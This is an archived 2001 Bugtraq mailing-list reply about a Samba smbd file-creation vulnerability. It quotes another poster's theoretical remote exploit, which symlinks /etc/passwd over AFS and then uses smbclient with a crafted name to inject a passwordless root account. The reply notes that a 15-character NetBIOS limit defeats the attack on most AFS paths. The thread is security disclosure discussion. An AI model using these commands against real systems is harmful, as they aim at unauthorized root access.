[21318] in bugtraq


Re: smbd remote file creation vulnerability

daemon@ATHENA.MIT.EDU (Daniel Jacobowitz)
Tue Jul 3 13:18:48 2001

Date: Mon, 2 Jul 2001 14:30:41 -0700
From: Daniel Jacobowitz <dmj+@andrew.cmu.edu>
To: Christopher William Palow <cwp@andrew.cmu.edu>
Cc: bugtraq@securityfocus.com
Message-ID: <20010702143041.A798@nevyn.them.org>
Mail-Followup-To: Christopher William Palow <cwp@andrew.cmu.edu>,
	bugtraq@securityfocus.com
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <Pine.LNX.4.21L-021.0107021108330.1654-100000@unix45.andrew.cmu.edu>; from cwp@andrew.cmu.edu on Mon, Jul 02, 2001 at 11:15:29AM -0400

On Mon, Jul 02, 2001 at 11:15:29AM -0400, Christopher William Palow wrote:
> I was hoping to test this out but haven't been able to, so here goes on
> theoretical...
> 
> How to make this exploit a remote one using AFS or other remote file
> systems.
> 
> What does this exploit need on the remote side?  A
> symlink; so... on an AFS system, preferably one of a well-known node that
> most AFS servers would have in their CellServDB such as
> andrew.cmu.edu or athena.mit.edu, create a symlink to /etc/passwd named
> x.log like
> 
> ln -s /etc/passwd /afs/andrew.cmu.edu/usr/<username>/x.log
> 
> now make the symlink world readable... then all you need is UNIXes running
> samba in the vulnerable configuration and running AFS.
> 
> smbclient //afs.machine/"`perl -e '{print "\ntoor::0:0::/:/bin/sh\n"}'`" \ 
>  -n ../../../afs/andrew.cmu.edu/usr/<username>/x -N
> telnet afs.machine
> login as toor
> 
> if root logins aren't allowed, make a dummy account first, login with that,
> then make a toor account on top of that and su over to toor.

Remember, the log path must be within 15 characters to fit in a NetBIOS
name!  You're not going to get anywhere on andrew, or most other AFS
paths, with that restriction.

-- 
Daniel Jacobowitz                           Carnegie Mellon University
MontaVista Software                         Debian GNU/Linux Developer
